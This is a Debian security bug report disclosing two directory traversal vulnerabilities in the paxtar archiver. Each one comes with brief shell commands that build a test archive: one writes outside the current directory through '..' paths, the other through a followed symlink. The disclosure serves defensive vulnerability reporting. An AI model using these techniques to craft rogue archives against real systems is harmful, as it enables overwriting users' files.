Bug#774716: paxtar: directory traversal vulnerabilities
Package: pax
Version: 1:20140703-2
Tags: security
paxtar is susceptible to directory traversal vulnerabilities. They can
be exploited by a rogue archive to write files outside the current
directory.
1. paxtar will extract files with .. components in names.
For example, let's create a sample archive:
echo hello > ../file
paxtar cvf test.tar ../file
rm ../file
and then test it:
paxtar xvf test.tar
This will create a file "../file".
2. While extracting an archive, it will extract symlinks and then follow
them if they are referenced in further entries.
For example, let's create a sample archive:
ln -s /tmp dir
paxtar cvf test.tar dir
rm dir
mkdir dir
echo hello > dir/file
paxtar rvf test.tar dir/file
rm -r dir
and then test it:
paxtar xvf test.tar
This will create a symlink "dir" in the current directory and a file
"/tmp/file".
--
Alexander Cherepanov
Reply to: